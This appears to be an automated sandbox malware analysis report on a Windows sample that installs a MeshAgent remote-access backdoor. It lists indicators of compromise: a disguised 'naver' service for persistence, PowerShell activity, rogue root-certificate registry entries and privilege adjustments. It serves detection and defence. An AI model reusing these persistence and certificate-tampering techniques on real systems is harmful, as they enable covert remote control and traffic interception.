Malware Analysis Report

2024-10-23 20:21

Sample ID 240924-d2aa5sshjj
Target 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch
SHA256 b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf
Tags
meshagent backdoor discovery execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf

Threat Level: Known bad

The file 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan

MeshAgent

Detects MeshAgent payload

Sets service image path in registry

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-24 03:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-24 03:29

Reported

2024-09-24 03:32

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-24 03:29

Reported

2024-09-24 03:32

Platform

win10v2004-20240802-en

Max time kernel

124s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ntdll.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\combase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\kernel32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ACF87FF98E1EEF3E8BDBF7A9EB64B06CF2BDE3D5 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\F33F806F032136DC54AFC3EA1B57FBCB325C22E0 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0BAF0E556ED1305266A37277DFD1935DBD98B214 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716222161613689" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
